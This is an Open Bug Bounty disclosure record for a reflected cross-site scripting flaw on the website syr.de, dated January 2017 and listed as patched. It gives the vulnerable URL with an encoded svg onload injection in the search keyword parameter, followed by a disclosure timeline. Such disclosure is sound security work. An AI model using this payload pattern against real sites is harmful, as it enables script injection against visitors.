syr.de XSS vulnerability

2017-01-11T15:05:00
ID OBB:205563
Type openbugbounty
Reporter AbdeOuabala
Modified 2017-01-12T11:45:00

Description

Vulnerable URL:
http://www.syr.de/index.asp?art=suche&searchview;=product&keyword;=dsds%22%3E%3Csvg%2Fonload%3Dprompt%281%29%3E
Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 806715
VIP website status:| No
Check syr.de SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported via Full Disclosure| 11 January, 2017 15:05 GMT
Vulnerability existence verified and confirmed| 12 January, 2017 11:45 GMT
Generic security notifications sent to website owner| 12 January, 2017 11:45 GMT
Vulnerability details disclosed by researcher| 12 January, 2017 11:45 GMT